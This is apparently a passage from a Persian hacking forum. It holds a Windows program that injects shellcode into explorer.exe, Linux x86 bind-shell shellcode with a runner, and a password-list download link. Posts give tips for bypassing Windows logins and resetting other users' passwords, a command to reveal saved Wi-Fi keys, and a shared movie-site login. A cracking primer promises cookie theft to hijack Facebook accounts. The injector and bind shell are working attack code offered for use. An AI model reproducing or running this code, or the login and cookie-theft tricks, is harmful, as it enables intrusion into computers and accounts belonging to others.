x49\x01\xfd\x49\x8d\x14\x24\x4c\x89\xf1\x41\xff\xd5\x48\x31\xd2\x41\xc7\x04\x24\x43\x6f\x6e\x73\x41\xc7\x44\x24\x04\x6f\x6c\x65\x57\x41\xc7\x44\x24\x08\x69\x6e\x64\x6f\x41\xc7\x44\x24\x0c\x77\x43\x6c\x61\x66\x41\xc7\x44\x24\x10\x73\x73\x41\x88\x54\x24\x12\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd0\x48\x31\xd2\x41\xc7\x04\x24\x53\x68\x6f\x77\x41\xc7\x44\x24\x04\x57\x69\x6e\x64\x66\x41\xc7\x44\x24\x08\x6f\x77\x41\x88\x54\x24\x0a\x49\x8d\x14\x24\x4c\x89\xf1\x41\x55\x5b\x49\x89\xc5\xff\xd3\x4c\x89\xe9\x48\x31\xd2\xff\xd0\x4d\x31\xc0\x41\x50\x5a\x66\xba\x1f\x04\x8b\x1c\x96\x48\x01\xfb\x41\x50\x5a\xb2\x80\x49\x8d\x0c\x24\xff\xd3\x48\x31\xd2\x41\xc7\x44\x24\xf4\x63\x6d\x64\x41\x41\x88\x54\x24\xf7\xb2\x68\x49\x89\x14\x24\xb2\xff\x48\xff\xc2\x49\x8b\x44\x24\xf8\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x48\x83\xec\x58\x48\x31\xc9\x4d\x31\xc9\x6a\x01\x41\x58\x4c\x89\x44\x24\x20\x48\x89\x4c\x24\x28\x48\x89\x4c\x24\x30\x48\x89\x4c\x24\x38\x49\x8d\x14\x24\x48\x89\x54\x24\x40\x49\x8d\x54\x24\x68\x48\x89\x54\x24\x48\x4d\x31\xc0\x49\x8d\x54\x24\xf4\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x48\x01\xfb\xff\xd3\x48\x31\xd2\x52\x66\xba\x29\x01\x8b\x1c\x96\x48\x01\xfb\x59\x48\x83\xc4\x58\xff\xd3"; int main() { HANDLE s,proc; PROCESSENTRY32 ps; BOOL process_found=0; LPVOID shell; SIZE_T total; //finding explorer.exe pid ps.dwSize=sizeof(ps); s=CreateToolhelp32Snapshot(2,0); if(s==INVALID_HANDLE_VALUE) { printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError()); return -1; } if(!Process32First(s,&ps)) { printf("Process32First() failed.Error code %d\n",GetLastError()); return -1; } do{ if(0==strcmp(ps.szExeFile,"explorer.exe")) { process_found=1; break; } }while(Process32Next(s,&ps)); if(!process_found) { printf("Unknown Process\n"); return -1; } //opening process using pid proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID); if(proc==INVALID_HANDLE_VALUE) { printf("OpenProcess() failed.Error code %d\n",GetLastError()); return -1; } //allocating memory process memory if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL) { printf("Failed to allocate memory into process"); CloseHandle(proc); return -1; } //writing shellcode into process memory WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total); if(sizeof(shellcode)!=total) { printf("Failed write shellcode into process memory"); CloseHandle(proc); return -1; } //Executing shellcode if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL) { printf("Failed to Execute shellcode"); CloseHandle(proc); return -1; } CloseHandle(proc); CloseHandle(s); return 0; }
  18. /* * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86 * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net> * * portbind shellcode that bind()'s a shell on port 64713/tcp * and requests a user password. * */ char shellcode[] = /* socket(AF_INET, SOCK_STREAM, 0) */ "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x99" // cltd "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx "\xcd\x80" // int $0x80 /* bind(s, server, sizeof(server)) */ "\x52" // push %edx "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 "\x66\x6a\x02" // pushw $0x2 "\x89\xe1" // mov $esp,%ecx "\x6a\x10" // push $0x10 "\x51" // push %ecx "\x50" // push %eax "\x89\xe1" // mov %esp,%ecx "\x89\xc6" // mov %eax,%esi "\x43" // inc %ebx "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 /* listen(s, anything) */ "\xb0\x66" // mov $0x66,%al "\xd1\xe3" // shl %ebx "\xcd\x80" // int $0x80 /* accept(s, 0, 0) */ "\x52" // push %edx "\x52" // push %edx "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\x43" // inc %ebx "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 "\x96" // xchg %eax,%esi /* send(s, "Password: ", 0x0a, flags) */ "\x52" // push %edx "\x68\x72\x64\x3a\x20" // push $0x203a6472 "\x68\x73\x73\x77\x6f" // push $0x6f777373 "\x66\x68\x50\x61" // pushw $0x6150 "\x89\xe7" // mov $esp,%edi "\x6a\x0a" // push $0xa "\x57" // push %edi "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\xb3\x09" // mov $0x9,%bl "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 /* recv(s, *buf, 0x08, flags) */ "\x52" // push %edx "\x6a\x08" // push $0x8 "\x8d\x4c\x24\x08" // lea 0x8(%esp),%ecx "\x51" // push %ecx "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\xb3\x0a" // mov $0xa,%bl "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 "\x87\xf3" // xchg %esi,%ebx /* like: strncmp(string1, string2, 0x8) */ "\x52" // push %edx "\x68\x61\x75\x6c\x74" // push $0x746c7561 // password "\x68\x67\x6f\x74\x66" // push $0x66746f67 // here "\x89\xe7" // mov %esp,%edi "\x8d\x74\x24\x1c" // lea 0x1c(%esp),%esi "\x89\xd1" // mov %edx,%ecx "\x80\xc1\x08" // add $0x8,%cl "\xfc" // cld "\xf3\xa6" // repz cmpsb %es:(%edi),%ds:(%esi) "\x74\x04" // je dup /* exit(something) */ "\xf7\xf0" // div %eax "\xcd\x80" // int $0x80 /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ "\x6a\x02" // push $0x2 "\x59" // pop %ecx "\xb0\x3f" // mov $0x3f,%al "\xcd\x80" // int $0x80 "\x49" // dec %ecx "\x79\xf9" // jns dup_loop /* execve("/bin/sh", ["/bin/sh"], NULL) */ "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp, %ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp, %ecx "\xcd\x80"; // int $0x80 int main() { int (*f)() = (int(*)())shellcode; printf("Length: %u\n", strlen(shellcode)); f(); }
  19. 197

    Miscellaneous

    13 - Improving Password Security
  20. 197

    Miscellaneous

    12 - Attacking Passwords
  21. Moeein Seven

    Cracking

    باسلام بهترین پسوورد لیست های سال رو برای شما اماده کردم در پکیج زیر لینک دانلود : http://uupload.ir/view/vbe5_pass_list.rar
  22. ReZa CLONER

    رمز هاي كامپيوتري يكي از مهمترين بخش هاي امنيتي در كامپيوتر است. اين رمز ها هستند كه تا حدي امنيت كامپيوتر را در برابر هكر ها و اشخاصي كه ميخواهند بي اجازه به اطلاعات شخصي شما دست پيدا كنند بيشتر ميكند اما راه هاي نفوذي ديگري هم هست كه خيلي از ما از انها بي خبريم و هركس كه انها را بلد باشد ميتواند به رايانه شخصي شما نفوذ كند. من در اين مقاله ميخواهم اين راه هاي نفوذي را به شما ياد بدهم و چگونگي بستن اين راه هاي نفوذ را هم ياد بدهم. اگر صفحه اي كه بايد رمز را در ان وارد كنيم در اول لود شدن ويندوز امد اين صفحه دوحالت دارد يكي كه عكس است و بايد روي ان كليك كنيم يكي اينكه يوزر نام و پسورد را وارد كنيم. اگر صفحه داراي عكس امد ميتوانيم دوبار الت و كنترل و دليت (alt,ctrl,delete)را بگيريم تا صفجه مورد نظر ما باز شود. حالا ميخواهيم رمز را بدون دانستن ان باز كنيم. در يوزر نام ان administrator را تايپ كنيد و اينتر را بزنيد. حالا كامپيوتر وارد دسكتاپ ميشود و كامپيوتر باز ميشود. ما نكته اينجاست كه بعضي ها اين مسئله را ميدانند و روي اين يوزر نام هم رمز ميگذارند اما نميدانند كه خود ويندوز اكانت هايي دارد كه ميتوانيم با انها وارد كامپيوتر شويم. حالا اگر كامپيوتر با يوزر نام administrator باز نشد به جاي ان guest يعني ميهمان را وارد كنيد كه 100 درصد باز ميشود و اگر هم به احتمال كم يعني خيلي كم ديگر هيچ را نفوذي ندارد. حالا كه باز شد ممكن است اطلاعاتي كه ميخواهيد روي يوزر اصلي باشد و بايد وارد ان شويد. براي اين كار وارد استارت منو شده و وارد ران شويد براي اين كار ميتوانيد در كيبورد كليد آر را بزنيد حالا در قسمت مورد نظر كلمه زير را تايپ كنيد. control userpasswords2 حالا يوزر نيم شخص را پيدا كنيد و براي عوض كردن پسورد ان ريست پسورد را در پايين بزنيد . حالا با دادن يك بار رمز شما و يك بار تكرار رمز پسورد كامپيوتر عوض ميشود. اگر ميخواهيد كه شما اين راه نفوذي را ببنديد روي اكانت گست (مهمان)كليك كنيد و ريست پسورد را بزنيد.حالا با تكرار مرحله قبل ديگر كسي نميتواند به كامپيوتر شما وارد شود.
  23. Milad shadow

    روش اول : وارد محیط cmd بشید? فک کنم دیگه همه بلد باشید cmd باز کنید? سپس متن زیر و وارد کنید:☺️ netsh wlan show profiles خب حالا اسم تمام وای فایی که بهشون وصل بودید اومده? حالا باید متن زیر تایپ کنید : netsh wlan show profiles wifiname key=clear توجه داشته باشید که به جای wifiname اسم وای فای خودتون بزنید? خب حالا توی ستون key content پسورد بردارید?? روش دوم: وقتی به وای فای وصل شدید وارد کنترل پنل شوید و گزینه زیر انتخاب کنید❤️: network and sharing center حالا روی اسم وای فای خودتون کلیک کنید? گزینه wireless properties کلیک کنید و زبانهsecurty بزنید و گزینه show.... بزنید و پسوردو بزنید
  24. Mr Fucker

    آدرس: https://www.1kingmovi.in آموزش استفاده: این اکانت فقط برای دانلود منیجر مناسبه موقع دانلود فیلم یوزر پسورد رو وارد کنید.اول برید ثبت نام کنید تا لینک های نمایش داده بشه،موقع دانلود یوزر پسورد رو وارد کنید. User:pass moslem:moslem
  25. ما با اصول ایصلی کرک پسورد و تمام تکنیک های ضروری کرک پسورد رو یاد خواهیم گرفت من در حال حاضر بر روی اموزش لینوکس کار میکنم اما اموزش thc hydra و اموزش هک وای فای رو بصورت حرفه ای خواهم گذاشت اهمیت و روش های کرک کردن رمز عبور پسورد ها به طور کلی سیستم احراز هویت کاربران اینترنتی هستند مردم در سراسر جهان در حال استفاده از یوزرنیم ها و پسورد ها هستند مثلا پین حصاب بانکیشان یا ایمیل و... برای یک هکر ضروری است که مقداری از کرک را بلد باشید اگر چه پسورد برخی از افراد به سادگی هک میشوند برخی میگویند پسوردی بگزاریم که یادمون نره اما افرادی هستند که پسورد های دشواری میگزارند برای همین کرک آنان بسیار دشوار است. در این مواقع فردی که قصد کرک را دارد میتواند از ابزار هایی مانند: (botnet, supercomputer, GPU, ASIC, etc) یا اینکه از روش های دیگری برای کرک آن استفاده کند ما هیچ وقت نمیتوانیم تمامی روش ها را بنویسیم من در آینده به شما یاد خواهم داد که کوکی های افراد را سرقت کنید تا به حصاب فیس بوک آنان دسترسی پیدا کنید حالا بیاید با اصول اولیه شروع کنیم ذخیره سازی رمز عبور احتمالا تا حالا به کلمه هش (Hash) بر خورد کرده اید معمولا افراد برای شناسایی نشدن پسورد خود آن ها را در هش ها جایگزاری میکنند این سیستم معمولا MD5 یا SHA1 هستند در سیستم عامل ویندوز، کلمه عبور بر روی سیستم محلی در فایل SAM ذخیره می شود در حالی که لینوکس آن ها را در /etc/shadow/ ذخیره میکند شما برای دسترسی به این فایل باید دسترسی روت داشته باشید